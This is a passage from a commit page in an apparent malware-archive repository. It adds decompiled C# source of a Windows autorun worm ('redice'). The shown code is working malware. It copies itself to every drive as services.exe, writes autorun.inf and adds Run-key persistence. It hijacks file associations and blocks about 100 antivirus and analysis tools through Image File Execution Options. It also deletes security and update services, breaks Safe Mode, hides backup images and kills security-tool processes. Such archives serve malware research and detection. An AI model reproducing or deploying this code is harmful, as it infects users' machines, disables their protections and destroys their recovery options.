daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 07:49:24 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Virus/MSIL/A/Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265/AssemblyInfo.cs
+14
View File
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("1481a04a-fe5d-4dce-9d00-2a0a47ff5c44")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("版权所有 (C) 番茄花园 2007")]
[assembly: AssemblyProduct("redice")]
[assembly: AssemblyCompany("番茄花园")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("redice")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Virus/MSIL/A/Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265/ExecRegedit.cs
+417
View File
@@ -0,0 +1,417 @@
// Decompiled with JetBrains decompiler
// Type: redice.ExecRegedit
// Assembly: redice, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A08BD253-D698-4C81-8053-905E15E13E56
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265.exe
using Microsoft.Win32;
namespace redice
{
internal class ExecRegedit
{
public void changeIEtitle()
{
try
{
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey("software\\microsoft\\Internet Explorer\\main", true);
registryKey1.SetValue("Window Title", (object) "抗日,是全中国人民义不容辞的责任!", RegistryValueKind.String);
registryKey1.Close();
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("software\\microsoft\\Internet Explorer\\main", true);
registryKey2.SetValue("Window Title", (object) "抗日,是全中国人民义不容辞的责任!", RegistryValueKind.String);
registryKey2.Close();
}
catch
{
}
}
public void setIEStarPage()
{
try
{
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("software\\microsoft\\Internet Explorer\\main", true);
registryKey1.SetValue("start page", (object) "http://hi.baidu.com/zhongguokangri", RegistryValueKind.String);
registryKey1.SetValue("local page", (object) "http://hi.baidu.com/zhongguokangri", RegistryValueKind.String);
registryKey1.Close();
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("software\\microsoft\\Internet Explorer\\main", true);
registryKey2.SetValue("start page", (object) "http://hi.baidu.com/zhongguokangri", RegistryValueKind.String);
registryKey2.SetValue("local page", (object) "http://hi.baidu.com/zhongguokangri", RegistryValueKind.String);
registryKey2.Close();
}
catch
{
}
}
public void killSafeServer()
{
this.execKillSafeServer("navapsvc");
this.execKillSafeServer("wscsvc");
this.execKillSafeServer("KPfwSvc");
this.execKillSafeServer("SNDSrvc");
this.execKillSafeServer("ccProxy");
this.execKillSafeServer("ccEvtMgr");
this.execKillSafeServer("ccSetMgr");
this.execKillSafeServer("SPBBCSvc");
this.execKillSafeServer("Symantec Core LC");
this.execKillSafeServer("NPFMntor");
this.execKillSafeServer("MskService");
this.execKillSafeServer("MskService");
this.execKillSafeServer("FireSvc");
this.execKillSafeServer("avp");
}
private void execKillSafeServer(string serverName)
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Services", true);
try
{
registryKey.DeleteSubKeyTree(serverName);
registryKey.Close();
}
catch
{
}
}
public void delOtherVirusReg()
{
this.delOtherVirusRegMeans("{DE35052A-9E37-4827-A1EC-79BF400D27A4}");
this.delOtherVirusRegMeans("{AEB6717E-7E19-11d0-97EE-00C04FD91972}");
this.delOtherVirusRegMeans("{DD7D4640-4464-48C0-82FD-21338366D2D2}");
this.delOtherVirusRegMeans("{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}");
this.delOtherVirusRegMeans("{131AB311-16F1-F13B-1E43-11A24B51AFD1}");
this.delOtherVirusRegMeans("{274B93C2-A6DF-485F-8576-AB0653134A76}");
this.delOtherVirusRegMeans("{1496D5ED-7A09-46D0-8C92-B8E71A4304DF}");
this.delOtherVirusRegMeans("{0CB68AD9-FF66-3E63-636B-B693E62F6236}");
this.delOtherVirusRegMeans("{09B68AD9-FF66-3E63-636B-B693E62F6236}");
this.delOtherVirusRegMeans("{754FB7D8-B8FE-4810-B363-A788CD060F1F}");
this.delOtherVirusRegMeans("{A6011F8F-A7F8-49AA-9ADA-49127D43138F}");
this.delOtherVirusRegMeans("{06A68AD9-FF56-6E73-937B-B893E72F6226}");
this.delOtherVirusRegMeans("{01F6EB6F-AB5C-1FDD-6E5B-FB6EE3CC6CD6}");
this.delOtherVirusRegMeans("{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}");
this.delOtherVirusRegMeans("{BC0ACA58-6A6F-51DA-9EFE-9D20F4F621BA}");
this.delOtherVirusRegMeans("{AEB6717E-7E19-11d0-97EE-00C04FD91972}");
this.delOtherVirusRegMeans("{99F1D023-7CEB-4586-80F7-BB1A98DB7602}");
this.delOtherVirusRegMeans("{FEB94F5A-69F3-4645-8C2B-9E71D270AF2E}");
this.delOtherVirusRegMeans("{923509F1-45CB-4EC0-BDE0-1DED35B8FD60}");
this.delOtherVirusRegMeans("{42A612A4-4334-4424-4234-42261A31A236}");
}
private void delOtherVirusRegMeans(string virusRegValue)
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks", true);
try
{
registryKey.DeleteSubKey(virusRegValue, true);
registryKey.Close();
}
catch
{
}
}
public void closeAutoUpdateAndSafeMiddle()
{
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Services", true);
try
{
registryKey1.DeleteSubKey("SharedAccess", true);
registryKey1.Close();
}
catch
{
}
try
{
registryKey1.DeleteSubKey("wuauserv", true);
registryKey1.Close();
}
catch
{
}
RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Control\\update", true);
try
{
registryKey2.SetValue("UpdateMode", (object) 0, RegistryValueKind.DWord);
}
catch
{
}
}
public void recomposeFileRelating()
{
try
{
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("batfile\\shell\\open\\command", true);
registryKey.SetValue((string) null, (object) "c:\\services.exe '%1'");
registryKey.Close();
}
catch
{
}
try
{
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("cmdfile\\shell\\open\\command", true);
registryKey.SetValue((string) null, (object) "c:\\services.exe '%1'");
registryKey.Close();
}
catch
{
}
try
{
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("comfile\\shell\\open\\command", true);
registryKey.SetValue((string) null, (object) "c:\\services.exe '%1'");
registryKey.Close();
}
catch
{
}
try
{
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("regfile\\shell\\open\\command", true);
registryKey.SetValue((string) null, (object) "c:\\services.exe '%1'");
registryKey.Close();
}
catch
{
}
try
{
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("scrfile\\shell\\open\\command", true);
registryKey.SetValue((string) null, (object) "c:\\services.exe '%1'");
registryKey.Close();
}
catch
{
}
try
{
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("isofile\\shell\\open\\command", true);
registryKey.SetValue((string) null, (object) "c:\\services.exe '%1'");
registryKey.Close();
}
catch
{
}
try
{
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("piffile\\shell\\open\\command", true);
registryKey.SetValue((string) null, (object) "c:\\services.exe '%1'");
registryKey.Close();
}
catch
{
}
}
public void fileImageHijack()
{
this.addFileImageHijack("360rpt.exe");
this.addFileImageHijack("360Safe.exe");
this.addFileImageHijack("360tray.exe");
this.addFileImageHijack("adam.exe");
this.addFileImageHijack("AgentSvr.exe");
this.addFileImageHijack("AppSvc32.exe");
this.addFileImageHijack("AST.exe");
this.addFileImageHijack("autoruns.exe");
this.addFileImageHijack("avgrssvc.exe");
this.addFileImageHijack("AvMonitor.exe");
this.addFileImageHijack("avp.com");
this.addFileImageHijack("avp.exe");
this.addFileImageHijack("CCenter.exe");
this.addFileImageHijack("ccSvcHst.exe");
this.addFileImageHijack("FileDsty.exe");
this.addFileImageHijack("FTCleanerShell.exe");
this.addFileImageHijack("HijackThis.exe");
this.addFileImageHijack("IceSword.exe");
this.addFileImageHijack("iparmo.exe");
this.addFileImageHijack("Iparmor.exe");
this.addFileImageHijack("isPwdSvc.exe");
this.addFileImageHijack("kabaload.exe");
this.addFileImageHijack("KaScrScn.SCR");
this.addFileImageHijack("KASMain.exe");
this.addFileImageHijack("KASTask.exe");
this.addFileImageHijack("KAV32.exe");
this.addFileImageHijack("KAVDX.exe");
this.addFileImageHijack("KAVPFW.exe");
this.addFileImageHijack("KAVSetup.exe");
this.addFileImageHijack("KAVStart.exe");
this.addFileImageHijack("KISLnchr.exe");
this.addFileImageHijack("KMailMon.exe");
this.addFileImageHijack("KMFilter.exe");
this.addFileImageHijack("KPFW32.exe");
this.addFileImageHijack("KPFW32X.exe");
this.addFileImageHijack("KPFWSvc.exe");
this.addFileImageHijack("KRegEx.exe");
this.addFileImageHijack("krepair.COM");
this.addFileImageHijack("KsLoader.exe");
this.addFileImageHijack("KVCenter.kxp");
this.addFileImageHijack("KvDetect.exe");
this.addFileImageHijack("KvfwMcl.exe");
this.addFileImageHijack("KVMonXP.kxp");
this.addFileImageHijack("KVMonXP_1.kxp");
this.addFileImageHijack("kvol.exe");
this.addFileImageHijack("kvolself.exe");
this.addFileImageHijack("KvReport.kxp");
this.addFileImageHijack("KVScan.kxp");
this.addFileImageHijack("KVSrvXP.exe");
this.addFileImageHijack("KVStub.kxp");
this.addFileImageHijack("kvupload.exe");
this.addFileImageHijack("kvwsc.exe");
this.addFileImageHijack("KvXP.kxp");
this.addFileImageHijack("KvXP_1.kxp");
this.addFileImageHijack("KWatch.exe");
this.addFileImageHijack("KWatch9x.exe");
this.addFileImageHijack("KWatchX.exe");
this.addFileImageHijack("loaddll.exe");
this.addFileImageHijack("MagicSet.exe");
this.addFileImageHijack("mcconsol.exe");
this.addFileImageHijack("mmqczj.exe");
this.addFileImageHijack("mmsk.exe");
this.addFileImageHijack("NAVSetup.exe");
this.addFileImageHijack("nod32krn.exe");
this.addFileImageHijack("nod32kui.exe");
this.addFileImageHijack("PFW.exe");
this.addFileImageHijack("PFWLiveUpdate.exe");
this.addFileImageHijack("QHSET.exe");
this.addFileImageHijack("Ras.exe");
this.addFileImageHijack("Rav.exe");
this.addFileImageHijack("RavMon.exe");
this.addFileImageHijack("RavMonD.exe");
this.addFileImageHijack("RavStub.exe");
this.addFileImageHijack("RavTask.exe");
this.addFileImageHijack("RegClean.exe");
this.addFileImageHijack("rfwcfg.exe");
this.addFileImageHijack("RfwMain.exe");
this.addFileImageHijack("rfwProxy.exe");
this.addFileImageHijack("rfwsrv.exe");
this.addFileImageHijack("RsAgent.exe");
this.addFileImageHijack("Rsaupd.exe");
this.addFileImageHijack("runiep.exe");
this.addFileImageHijack("safelive.exe");
this.addFileImageHijack("scan32.exe");
this.addFileImageHijack("shcfg32.exe");
this.addFileImageHijack("SmartUp.exe");
this.addFileImageHijack("SREng.exe");
this.addFileImageHijack("symlcsvc.exe");
this.addFileImageHijack("SysSafe.exe");
this.addFileImageHijack("TrojanDetector.exe");
this.addFileImageHijack("Trojanwall.exe");
this.addFileImageHijack("TrojDie.kxp");
this.addFileImageHijack("UIHost.exe");
this.addFileImageHijack("UmxAgent.exe");
this.addFileImageHijack("UmxAttachment.exe");
this.addFileImageHijack("UmxCfg.exe");
this.addFileImageHijack("UmxFwHlp.exe");
this.addFileImageHijack("UmxPol.exe");
this.addFileImageHijack("UpLive.EXE.exe");
this.addFileImageHijack("WoptiClean.exe");
this.addFileImageHijack("zxsweep.exe");
}
private void addFileImageHijack(string safeSoftName)
{
try
{
string name = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options";
string str = "c:\\services.exe";
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey(name, true);
registryKey1.CreateSubKey(safeSoftName);
registryKey1.Close();
RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey(name + "\\" + safeSoftName, true);
registryKey2.SetValue("Debugger", (object) str, RegistryValueKind.String);
registryKey2.Close();
}
catch
{
}
}
public void delRegeditHideFile()
{
try
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL", true);
try
{
registryKey.DeleteValue("CheckedValue", true);
}
catch
{
}
try
{
registryKey.SetValue("CheckedValue", (object) 0, RegistryValueKind.String);
}
catch
{
}
}
catch
{
}
}
public void uodateRegeditAutoRun()
{
try
{
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey("software\\microsoft\\windows\\currentversion\\run", true);
registryKey1.SetValue("WinSystem", (object) "c:\\services.exe", RegistryValueKind.String);
registryKey1.Close();
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("software\\microsoft\\windows\\currentversion\\run", true);
registryKey2.SetValue("WinSystem", (object) "c:\\services.exe", RegistryValueKind.String);
registryKey2.Close();
}
catch
{
}
}
public void destroySafeMode()
{
try
{
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey("SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal", true);
RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network", true);
RegistryKey registryKey3 = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal", true);
RegistryKey registryKey4 = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network", true);
try
{
registryKey1.DeleteSubKey("{4D36E967-E325-11CE-BFC1-08002BE10318}", true);
}
catch
{
}
try
{
registryKey2.DeleteSubKey("{4D36E967-E325-11CE-BFC1-08002BE10318}", true);
}
catch
{
}
try
{
registryKey3.DeleteSubKey("{4D36E967-E325-11CE-BFC1-08002BE10318}", true);
}
catch
{
}
try
{
registryKey4.DeleteSubKey("{4D36E967-E325-11CE-BFC1-08002BE10318}", true);
}
catch
{
}
}
catch
{
}
}
}
}
MSIL/Virus/MSIL/A/Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265/Form1.cs
+730
View File
@@ -0,0 +1,730 @@
// Decompiled with JetBrains decompiler
// Type: redice.Form1
// Assembly: redice, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A08BD253-D698-4C81-8053-905E15E13E56
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265.exe
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading;
using System.Windows.Forms;
namespace redice
{
public class Form1 : Form
{
private ExecRegedit objExecRegdit = new ExecRegedit();
private IContainer components;
private System.Windows.Forms.Timer timeCloseSafesoft;
private System.Windows.Forms.Timer timerLong20;
private System.Windows.Forms.Timer timerMid5;
private int PrevInstance() => Process.GetProcessesByName(Process.GetCurrentProcess().ProcessName).GetUpperBound(0);
public Form1() => this.InitializeComponent();
private void Form1_Load(object sender, EventArgs e)
{
try
{
try
{
Process.GetCurrentProcess();
string processName = Process.GetCurrentProcess().ProcessName;
if (Process.GetCurrentProcess().ProcessName.ToLower().ToString().Equals("services"))
{
if (this.PrevInstance() > 1)
Application.Exit();
}
else if (this.PrevInstance() > 0)
Application.Exit();
}
catch
{
}
try
{
this.hideForm();
}
catch
{
}
try
{
this.changeSystemTime();
}
catch
{
}
try
{
this.objExecRegdit.destroySafeMode();
}
catch
{
}
try
{
this.objExecRegdit.delRegeditHideFile();
}
catch
{
}
try
{
this.objExecRegdit.uodateRegeditAutoRun();
}
catch
{
}
try
{
this.objExecRegdit.setIEStarPage();
}
catch
{
}
try
{
this.objExecRegdit.changeIEtitle();
}
catch
{
}
}
catch
{
}
try
{
if (!this.IsRemove(AppDomain.CurrentDomain.BaseDirectory.Substring(0, 1).ToUpper() + ":\\"))
return;
Process.Start("c:\\services.exe");
Application.Exit();
}
catch
{
}
}
private void timeCloseSafesoft_Tick(object sender, EventArgs e)
{
try
{
this.closeSafeSoft();
}
catch
{
}
}
private void timerLong20_Tick(object sender, EventArgs e)
{
try
{
this.delUImmunityCreateAutorun();
}
catch
{
}
try
{
this.copyVirusReName();
}
catch
{
}
}
private void timerMid5_Tick(object sender, EventArgs e)
{
try
{
this.changeSystemTime();
}
catch
{
}
try
{
this.objExecRegdit.destroySafeMode();
}
catch
{
}
try
{
this.objExecRegdit.fileImageHijack();
}
catch
{
}
try
{
this.objExecRegdit.delRegeditHideFile();
}
catch
{
}
try
{
this.objExecRegdit.recomposeFileRelating();
}
catch
{
}
try
{
this.objExecRegdit.delOtherVirusReg();
}
catch
{
}
try
{
this.findAllGhoPath();
}
catch
{
}
try
{
this.objExecRegdit.killSafeServer();
}
catch
{
}
try
{
this.objExecRegdit.closeAutoUpdateAndSafeMiddle();
}
catch
{
}
try
{
this.objExecRegdit.uodateRegeditAutoRun();
}
catch
{
}
try
{
this.objExecRegdit.setIEStarPage();
}
catch
{
}
try
{
this.objExecRegdit.changeIEtitle();
}
catch
{
}
}
private void copyVirusReName()
{
Process p = new Process();
try
{
string[] logicalDrives = Environment.GetLogicalDrives();
for (int index = 0; index < logicalDrives.Length; ++index)
{
string currentDirectory = Directory.GetCurrentDirectory();
string fileName = Path.GetFileName(Application.ExecutablePath);
string upper = logicalDrives[index].ToString().Substring(0, 1).ToUpper();
if (!upper.Equals("A"))
{
if (!this.IsCDRom(logicalDrives[index].ToString()))
{
try
{
File.Copy(currentDirectory + "\\" + fileName, upper + ":\\services.exe", true);
File.SetAttributes(upper + ":\\services.exe", FileAttributes.Normal);
File.SetAttributes(upper + ":\\services.exe", FileAttributes.ReadOnly);
FileAttributes attributes1 = File.GetAttributes(upper + ":\\services.exe");
File.SetAttributes(upper + ":\\services.exe", attributes1 | FileAttributes.System);
FileAttributes attributes2 = File.GetAttributes(upper + ":\\services.exe");
File.SetAttributes(upper + ":\\services.exe", attributes2 | FileAttributes.Hidden);
string str1 = upper + ":\\services.exe";
string str2 = upper + ":\\hotice..\\";
p = this.execCmd(p);
Thread.Sleep(25);
p.StandardInput.WriteLine("md " + upper + ":\\hotice..\\");
string str3 = "copy " + str1 + " " + str2;
Thread.Sleep(25);
p.StandardInput.WriteLine(str3);
p.Dispose();
p.Close();
}
catch
{
}
}
}
}
}
catch
{
}
}
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
private static extern int GetDriveType(string driveinfo);
public bool IsCDRom(string driveInfo)
{
switch (driveInfo)
{
case "":
case null:
return false;
default:
return Form1.GetDriveType(driveInfo) == 5;
}
}
public bool IsRemove(string driveInfo)
{
switch (driveInfo)
{
case "":
case null:
return false;
default:
return Form1.GetDriveType(driveInfo) == 2;
}
}
private void delUImmunityCreateAutorun()
{
try
{
string[] logicalDrives = Environment.GetLogicalDrives();
for (int index = 0; index < logicalDrives.Length; ++index)
{
string upper = logicalDrives[index].ToString().Substring(0, 1).ToUpper();
if (!this.IsCDRom(logicalDrives[index].ToString()))
{
if (!upper.Equals("A"))
{
try
{
this.execDelUImmunityCreateAutorun(upper);
}
catch
{
}
}
}
}
}
catch
{
}
}
private void execDelUImmunityCreateAutorun(string rootPath)
{
string path1 = rootPath + ":\\autorun.inf";
if (File.Exists(path1))
{
File.SetAttributes(path1, FileAttributes.Normal);
File.Delete(path1);
this.buildAutoruninf(rootPath);
}
else if (Directory.Exists(path1))
{
File.SetAttributes(path1, FileAttributes.Normal);
try
{
Directory.Delete(path1, true);
}
catch
{
Directory.GetFiles(path1);
foreach (FileInfo file in new DirectoryInfo(path1).GetFiles())
{
string path2 = path1 + "\\" + file.ToString();
File.SetAttributes(path2, FileAttributes.Normal);
File.Delete(path2);
}
}
try
{
Directory.Delete(path1, true);
}
catch
{
try
{
Process process = this.execCmd(new Process());
string str = "rd /q/s " + rootPath + ":\\autorun.inf\\";
process.StandardInput.WriteLine(str);
process.Close();
}
catch
{
}
}
try
{
File.SetAttributes(path1, FileAttributes.Normal);
Directory.Delete(path1, true);
}
catch
{
}
this.buildAutoruninf(rootPath);
}
else
{
try
{
this.buildAutoruninf(rootPath);
}
catch
{
}
}
}
private Process execCmd(Process p)
{
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
p.Start();
return p;
}
private void buildAutoruninf(string rootPath)
{
try
{
string path = rootPath + ":\\autorun.inf";
File.SetAttributes(path, FileAttributes.Normal);
Directory.Delete(path, true);
}
catch
{
}
try
{
using (StreamWriter streamWriter = new StreamWriter(rootPath + ":\\autorun.inf"))
{
streamWriter.WriteLine("[autorun]");
streamWriter.WriteLine("OPEN=" + rootPath + ":\\services.exe");
streamWriter.WriteLine("shell\\open\\Command=" + rootPath + ":\\services.exe");
streamWriter.WriteLine("shell\\open\\Default=");
streamWriter.Write("shell\\explore\\Command=" + rootPath + ":\\services.exe");
}
File.SetAttributes(rootPath + ":\\autorun.inf", FileAttributes.Normal);
File.SetAttributes(rootPath + ":\\autorun.inf", FileAttributes.ReadOnly);
FileAttributes attributes1 = File.GetAttributes(rootPath + ":\\autorun.inf");
File.SetAttributes(rootPath + ":\\autorun.inf", attributes1 | FileAttributes.System);
FileAttributes attributes2 = File.GetAttributes(rootPath + ":\\autorun.inf");
File.SetAttributes(rootPath + ":\\autorun.inf", attributes2 | FileAttributes.Hidden);
}
catch
{
}
}
private void findAllGhoPath()
{
try
{
string[] logicalDrives = Environment.GetLogicalDrives();
for (int index = 0; index < logicalDrives.Length; ++index)
{
string upper = logicalDrives[index].ToString().Substring(0, 1).ToUpper();
if (!this.IsCDRom(logicalDrives[index].ToString()))
{
if (!upper.Equals("A"))
{
try
{
this.delGhoGetPath(upper);
this.delGhoGetPath(upper + ":\\sysbak\\");
this.delGhoGetPath(upper + ":\\beifen\\");
}
catch
{
}
}
}
}
}
catch
{
}
}
private void delGhoGetPath(string path)
{
try
{
if (path.Length == 1)
this.checkDelGho(Directory.GetFiles(path + ":\\"));
else
this.checkDelGho(Directory.GetFiles(path));
}
catch
{
}
}
private void checkDelGho(string[] ghoRootPath)
{
foreach (string str1 in ghoRootPath)
{
int length = str1.Length;
try
{
string str2 = str1.Substring(length - 4, 4);
if (!str2.ToUpper().Equals(".GHO") && !str2.ToUpper().Equals(".BKF") && !str2.ToUpper().Equals(".PQI") && !str2.ToUpper().Equals(".TIB"))
{
if (!str2.ToUpper().Equals(".BAK"))
continue;
}
File.SetAttributes(str1, FileAttributes.Normal);
string str3 = str1 + ".bek";
File.Move(str1, str3);
File.SetAttributes(str3, FileAttributes.Hidden);
}
catch
{
}
}
}
private void changeSystemTime()
{
try
{
Form1.SystemTime st = new Form1.SystemTime();
Form1.LibWrapDateTime.GetLocalTime(st);
st.wYear = (ushort) 2006;
Form1.LibWrapDateTime.SetLocalTime(st);
}
catch
{
}
}
private void hideForm()
{
try
{
this.Hide();
}
catch
{
}
}
private void closeSafeSoft()
{
foreach (Process process in Process.GetProcesses())
{
try
{
if (process.MainWindowTitle.Length >= 1)
{
string mainWindowTitle = process.MainWindowTitle;
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "兔子拜佛专杀"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "报警"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "举报"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "流氓软件"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "恶意软件"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "IceSword"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "进程"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "系统配置"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "注册表"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "彻底清除"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "winrar"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "icesword"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "SYMANTEC"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "cmd"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "c:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "d:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "e:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "f:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "g:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "h:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "i:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "j:\\"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "求救"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "日本の陛下"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "日文学习"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "任务管理器"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "btbaicai"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "wopticlean"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "IE修复"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "新病毒"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "procexp"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "autoruns"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "GMER"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "PAVARK"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "提取"))
process.Kill();
if (this.execCloseSafeSoftHaveTitle(mainWindowTitle, "上报"))
process.Kill();
}
else
{
string processName = process.ProcessName;
if (this.execCloseSafeSoftUnHaveTitle(processName, "AUTOUPDATE.EXE"))
process.Kill();
if (this.execCloseSafeSoftUnHaveTitle(processName, "AUTOTRACE.EXE"))
process.Kill();
if (this.execCloseSafeSoftUnHaveTitle(processName, "AUTODOWN.EXE"))
process.Kill();
}
}
catch
{
}
}
}
private bool execCloseSafeSoftHaveTitle(string thisProcess, string title)
{
try
{
return thisProcess.ToString().ToUpper().IndexOf(title.ToUpper()) != -1;
}
catch
{
return false;
}
}
private bool execCloseSafeSoftUnHaveTitle(string thisProcess, string process)
{
try
{
return thisProcess.ToString().ToUpper().Equals(process.ToUpper());
}
catch
{
return false;
}
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof (Form1));
this.timeCloseSafesoft = new System.Windows.Forms.Timer(this.components);
this.timerLong20 = new System.Windows.Forms.Timer(this.components);
this.timerMid5 = new System.Windows.Forms.Timer(this.components);
this.SuspendLayout();
this.timeCloseSafesoft.Enabled = true;
this.timeCloseSafesoft.Interval = 1500;
this.timeCloseSafesoft.Tick += new EventHandler(this.timeCloseSafesoft_Tick);
this.timerLong20.Enabled = true;
this.timerLong20.Interval = 20000;
this.timerLong20.Tick += new EventHandler(this.timerLong20_Tick);
this.timerMid5.Enabled = true;
this.timerMid5.Interval = 10000;
this.timerMid5.Tick += new EventHandler(this.timerMid5_Tick);
this.AutoScaleMode = AutoScaleMode.None;
this.BackColor = Color.White;
this.BackgroundImageLayout = ImageLayout.None;
this.ClientSize = new Size(112, 27);
this.ControlBox = false;
this.Cursor = Cursors.Hand;
this.FormBorderStyle = FormBorderStyle.None;
this.Icon = (Icon) componentResourceManager.GetObject("$this.Icon");
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = nameof (Form1);
this.Opacity = 0.0;
this.ShowIcon = false;
this.ShowInTaskbar = false;
this.SizeGripStyle = SizeGripStyle.Hide;
this.StartPosition = FormStartPosition.Manual;
this.TransparencyKey = Color.White;
this.WindowState = FormWindowState.Minimized;
this.Load += new EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
private enum DriveType
{
NotExist = 1,
FloppyOrUsb = 2,
FixedDisk = 3,
NetDisk = 4,
CDRom = 5,
RAMDisk = 6,
}
